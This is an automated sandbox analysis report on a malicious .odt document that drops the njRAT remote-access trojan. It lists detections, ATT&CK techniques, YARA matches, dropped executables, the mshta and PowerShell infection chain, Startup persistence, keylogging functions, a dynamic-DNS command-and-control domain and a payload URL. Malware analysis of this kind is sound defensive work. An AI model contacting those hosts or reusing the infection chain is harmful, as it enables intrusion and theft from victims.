Play interactive tour

Edit tour

Analysis Report AutoformLiscence bls activation.odt

Overview

General Information

Joe Sandbox Version:	27.0.0 Red Achat
Analysis ID:	967598
Start date:	30.09.2019
Start time:	19:54:47
Joe Sandbox Product:	Cloud
Overall analysis duration:	0h 9m 38s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	AutoformLiscence bls activation.odt
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 (Office 2010 SP2, Java 1.8.0_40 1.8.0_191, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.adwa.spyw.expl.evad.winODT@19/16@43/1
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 3.4% (good quality ratio 3.1%) Quality average: 76.2% Quality standard deviation: 30.9%
HCA Information:	Successful, ratio: 93% Number of executed functions: 170 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .odt Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Active ActiveX Object Active ActiveX Object Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): WMIADAP.exe, conhost.exe, svchost.exe Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtCreateFile calls found. Report size getting too big, too many NtOpenFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found.

Detection

Strategy	Score	Range	Reporting	Whitelisted	Threat	Detection
Threshold	100	0 - 100	Report FP / FN	false	njRat

Confidence

Strategy	Score	Range	Further Analysis Required?	Confidence
Threshold	5	0 - 5	false

Classification

Analysis Advice

Sample may offer command line options, please run it with the 'Execute binary with arguments' cookbook (it's possible that the command line switches require additional characters like: "-", "/", "--")

Sample monitors window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook

Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control
Valid Accounts	Windows Management Instrumentation1	Startup Items2	Startup Items2	Software Packing11	Input Capture1	Security Software Discovery11	Remote File Copy1	Email Collection1	Data Encrypted1	Remote File Copy1
Replication Through Removable Media	Scripting1	Registry Run Keys / Startup Folder221	Access Token Manipulation1	Disabling Security Tools21	Network Sniffing	File and Directory Discovery11	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Standard Cryptographic Protocol2
Drive-by Compromise	PowerShell2	Accessibility Features	Process Injection1	Scripting1	Input Capture	System Information Discovery12	Windows Remote Management	Clipboard Data1	Automated Exfiltration	Standard Non-Application Layer Protocol2
Exploit Public-Facing Application	Exploitation for Client Execution1	System Firmware	DLL Search Order Hijacking	Obfuscated Files or Information1	Credentials in Files	Query Registry1	Logon Scripts	Input Capture	Data Encrypted	Standard Application Layer Protocol12
Spearphishing Link	Command-Line Interface	Shortcut Modification	File System Permissions Weakness	Access Token Manipulation1	Account Manipulation	Process Discovery1	Shared Webroot	Data Staged	Scheduled Transfer	Standard Cryptographic Protocol
Spearphishing Attachment	Graphical User Interface	Modify Existing Service	New Service	Process Injection1	Brute Force	Application Window Discovery1	Third-party Software	Screen Capture	Data Transfer Size Limits	Commonly Used Port
Spearphishing via Service	Scripting	Path Interception	Scheduled Task	Software Packing	Two-Factor Authentication Interception	Remote System Discovery1	Pass the Hash	Email Collection	Exfiltration Over Command and Control Channel	Uncommonly Used Port

Signature Overview

Click to jump to signature section

AV Detection:

Antivirus or Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\exploit.exe	Avira: detection malicious, Label: TR/Dropper.Gen7
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Avira: detection malicious, Label: TR/Dropper.Gen7
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bde52a20d668d6f304b9db902c7cfc6b.exe	Avira: detection malicious, Label: TR/Dropper.Gen7
Source: C:\Users\user\AppData\Local\Temp\exploit.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bde52a20d668d6f304b9db902c7cfc6b.exe	Joe Sandbox ML: detected

Multi AV Scanner detection for submitted file

Show sources

Source: AutoformLiscence bls activation.odt

Virustotal: Detection: 28%

Perma Link

Antivirus or Machine Learning detection for unpacked file

Show sources

Source: 16.0.dllhost.exe.210000.0.unpack	Avira: Label: TR/Dropper.Gen7
Source: 10.2.exploit.exe.1d0000.0.unpack	Avira: Label: TR/Dropper.Gen7
Source: 11.0.dllhost.exe.210000.0.unpack	Avira: Label: TR/Dropper.Gen7
Source: 15.0.dllhost.exe.210000.0.unpack	Avira: Label: TR/Dropper.Gen7
Source: 11.2.dllhost.exe.210000.0.unpack	Avira: Label: TR/Dropper.Gen7
Source: 10.0.exploit.exe.1d0000.0.unpack	Avira: Label: TR/Dropper.Gen7
Source: 15.2.dllhost.exe.210000.0.unpack	Avira: Label: TR/Dropper.Gen7
Source: 16.2.dllhost.exe.210000.0.unpack	Avira: Label: TR/Dropper.Gen7

Spreading:

Enumerates the file system

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Windows\System32\mshta.exe

Jump to behavior

Networking:

Uses dynamic DNS services

Show sources

Source: unknown

DNS query: name: amibas8722.ddns.net

JA3 SSL client fingerprint seen in connection with other malware

Show sources

Source: Joe Sandbox View

JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d

Downloads files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4034EDD1-39EC-4103-8348-B2C91C1BCCBB}.tmp

Jump to behavior

Performs DNS lookups

Show sources

Source: unknown

DNS traffic detected: queries for: 1.top4top.net

Urls found in memory or binary data

Show sources

Source: WINWORD.EXE, 00000000.00000002.737062201.03570000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: WINWORD.EXE, 00000000.00000002.750721612.09630000.00000004.00000001.sdmp	String found in binary or memory: https://1.top4top.net/p_1301n6ked1.jpg

Uses HTTPS

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 49163 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49163

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to log keystrokes (.Net Source)

Show sources

Source: exploit.exe.9.dr, kl.cs	.Net Code: VKCodeToUnicode
Source: dllhost.exe.10.dr, kl.cs	.Net Code: VKCodeToUnicode
Source: 10.2.exploit.exe.1d0000.0.unpack, kl.cs	.Net Code: VKCodeToUnicode
Source: 10.0.exploit.exe.1d0000.0.unpack, kl.cs	.Net Code: VKCodeToUnicode
Source: bde52a20d668d6f304b9db902c7cfc6b.exe.11.dr, kl.cs	.Net Code: VKCodeToUnicode
Source: 11.0.dllhost.exe.210000.0.unpack, kl.cs	.Net Code: VKCodeToUnicode
Source: 11.2.dllhost.exe.210000.0.unpack, kl.cs	.Net Code: VKCodeToUnicode
Source: 15.0.dllhost.exe.210000.0.unpack, kl.cs	.Net Code: VKCodeToUnicode
Source: 15.2.dllhost.exe.210000.0.unpack, kl.cs	.Net Code: VKCodeToUnicode
Source: 16.0.dllhost.exe.210000.0.unpack, kl.cs	.Net Code: VKCodeToUnicode
Source: 16.2.dllhost.exe.210000.0.unpack, kl.cs	.Net Code: VKCodeToUnicode

Creates a window with clipboard capturing capabilities

Show sources

Source: C:\Windows\System32\mshta.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

E-Banking Fraud:

Found strings which match to known bank urls

Show sources

Source: WINWORD.EXE, 00000000.00000002.749917910.09290000.00000002.00000001.sdmp	String found in binary or memory: beneficial equals www.beneficial.com (Beneficial National Bank)
Source: WINWORD.EXE, 00000000.00000002.749917910.09290000.00000002.00000001.sdmp	String found in binary or memory: bluestem equals www.bluestem.com (Bluestem National Bank)
Source: WINWORD.EXE, 00000000.00000002.749917910.09290000.00000002.00000001.sdmp	String found in binary or memory: citynational equals www.citynational.com (City National Bank of Florida)
Source: WINWORD.EXE, 00000000.00000002.749917910.09290000.00000002.00000001.sdmp	String found in binary or memory: colonial equals www.colonial.com.au (Colonial State Bank)
Source: WINWORD.EXE, 00000000.00000002.749917910.09290000.00000002.00000001.sdmp	String found in binary or memory: countrywide equals www.countrywide.com (Countrywide Financial Corp.)
Source: WINWORD.EXE, 00000000.00000002.749917910.09290000.00000002.00000001.sdmp	String found in binary or memory: huntington equals www.huntington.com (Huntington Bancshares)
Source: WINWORD.EXE, 00000000.00000002.749917910.09290000.00000002.00000001.sdmp	String found in binary or memory: treasury equals www.treasury.boi.ie (Bank of Ireland Group Treasury)

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 0000000A.00000000.515356796.001D2000.00000020.00020000.sdmp, type: MEMORY	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000000.515356796.001D2000.00000020.00020000.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000009.00000002.520219680.023FF000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.520219680.023FF000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0000000A.00000002.535195631.01905000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.535195631.01905000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0000000F.00000000.586989058.00212000.00000020.00020000.sdmp, type: MEMORY	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000000.586989058.00212000.00000020.00020000.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000010.00000002.610854599.00212000.00000020.00020000.sdmp, type: MEMORY	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.610854599.00212000.00000020.00020000.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0000000F.00000002.600191296.00212000.00000020.00020000.sdmp, type: MEMORY	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.600191296.00212000.00000020.00020000.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0000000B.00000000.533213752.00212000.00000020.00020000.sdmp, type: MEMORY	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000000.533213752.00212000.00000020.00020000.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000010.00000000.597361125.00212000.00000020.00020000.sdmp, type: MEMORY	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000000.597361125.00212000.00000020.00020000.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0000000B.00000002.756194496.00212000.00000020.00020000.sdmp, type: MEMORY	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.756194496.00212000.00000020.00020000.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0000000A.00000002.533586619.001D2000.00000020.00020000.sdmp, type: MEMORY	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.533586619.001D2000.00000020.00020000.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: C:\Users\user\AppData\Local\Temp\exploit.exe, type: DROPPED	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Local\Temp\exploit.exe, type: DROPPED	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bde52a20d668d6f304b9db902c7cfc6b.exe, type: DROPPED	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bde52a20d668d6f304b9db902c7cfc6b.exe, type: DROPPED	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe, type: DROPPED	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe, type: DROPPED	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 11.0.dllhost.exe.210000.0.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 10.2.exploit.exe.1d0000.0.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 11.0.dllhost.exe.210000.0.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 10.2.exploit.exe.1d0000.0.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 16.0.dllhost.exe.210000.0.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 16.0.dllhost.exe.210000.0.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 15.0.dllhost.exe.210000.0.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 15.0.dllhost.exe.210000.0.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 11.2.dllhost.exe.210000.0.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 11.2.dllhost.exe.210000.0.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 10.0.exploit.exe.1d0000.0.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 10.0.exploit.exe.1d0000.0.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 16.2.dllhost.exe.210000.0.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 16.2.dllhost.exe.210000.0.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 15.2.dllhost.exe.210000.0.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 15.2.dllhost.exe.210000.0.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter

Powershell drops PE file

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\exploit.exe

Jump to dropped file

Contains functionality to call native functions

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_004CB2EE NtQuerySystemInformation,		9_2_004CB2EE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_004CB2CC NtQuerySystemInformation,		9_2_004CB2CC

Creates mutexes

Show sources

Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\bde52a20d668d6f304b9db902c7cfc6b

Reads the hosts file

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Searches for the Microsoft Outlook file path

Show sources

Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE	Jump to behavior

Yara signature match

Show sources

Source: 0000000A.00000000.515356796.001D2000.00000020.00020000.sdmp, type: MEMORY	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0000000A.00000000.515356796.001D2000.00000020.00020000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000009.00000002.520219680.023FF000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 00000009.00000002.520219680.023FF000.00000004.00000001.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0000000A.00000002.535195631.01905000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0000000A.00000002.535195631.01905000.00000004.00000001.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0000000F.00000000.586989058.00212000.00000020.00020000.sdmp, type: MEMORY	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0000000F.00000000.586989058.00212000.00000020.00020000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000010.00000002.610854599.00212000.00000020.00020000.sdmp, type: MEMORY	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 00000010.00000002.610854599.00212000.00000020.00020000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0000000F.00000002.600191296.00212000.00000020.00020000.sdmp, type: MEMORY	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0000000F.00000002.600191296.00212000.00000020.00020000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0000000B.00000000.533213752.00212000.00000020.00020000.sdmp, type: MEMORY	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0000000B.00000000.533213752.00212000.00000020.00020000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000010.00000000.597361125.00212000.00000020.00020000.sdmp, type: MEMORY	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 00000010.00000000.597361125.00212000.00000020.00020000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0000000B.00000002.756194496.00212000.00000020.00020000.sdmp, type: MEMORY	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0000000B.00000002.756194496.00212000.00000020.00020000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0000000A.00000002.533586619.001D2000.00000020.00020000.sdmp, type: MEMORY	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0000000A.00000002.533586619.001D2000.00000020.00020000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: C:\Users\user\AppData\Local\Temp\exploit.exe, type: DROPPED	Matched rule: CN_disclosed_20180208_c_RID2E71 date = 2018-02-08 11:14:41, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/, score = demo, minimum_yara = 1.7
Source: C:\Users\user\AppData\Local\Temp\exploit.exe, type: DROPPED	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: C:\Users\user\AppData\Local\Temp\exploit.exe, type: DROPPED	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bde52a20d668d6f304b9db902c7cfc6b.exe, type: DROPPED	Matched rule: CN_disclosed_20180208_c_RID2E71 date = 2018-02-08 11:14:41, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/, score = demo, minimum_yara = 1.7
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bde52a20d668d6f304b9db902c7cfc6b.exe, type: DROPPED	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bde52a20d668d6f304b9db902c7cfc6b.exe, type: DROPPED	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe, type: DROPPED	Matched rule: CN_disclosed_20180208_c_RID2E71 date = 2018-02-08 11:14:41, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/, score = demo, minimum_yara = 1.7
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe, type: DROPPED	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe, type: DROPPED	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 11.0.dllhost.exe.210000.0.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_c_RID2E71 date = 2018-02-08 11:14:41, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/, score = demo, minimum_yara = 1.7
Source: 10.2.exploit.exe.1d0000.0.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_c_RID2E71 date = 2018-02-08 11:14:41, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/, score = demo, minimum_yara = 1.7
Source: 11.0.dllhost.exe.210000.0.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 10.2.exploit.exe.1d0000.0.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 11.0.dllhost.exe.210000.0.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 10.2.exploit.exe.1d0000.0.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 16.0.dllhost.exe.210000.0.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_c_RID2E71 date = 2018-02-08 11:14:41, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/, score = demo, minimum_yara = 1.7
Source: 16.0.dllhost.exe.210000.0.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 16.0.dllhost.exe.210000.0.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 15.0.dllhost.exe.210000.0.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_c_RID2E71 date = 2018-02-08 11:14:41, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/, score = demo, minimum_yara = 1.7
Source: 15.0.dllhost.exe.210000.0.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 15.0.dllhost.exe.210000.0.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 11.2.dllhost.exe.210000.0.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_c_RID2E71 date = 2018-02-08 11:14:41, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/, score = demo, minimum_yara = 1.7
Source: 11.2.dllhost.exe.210000.0.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
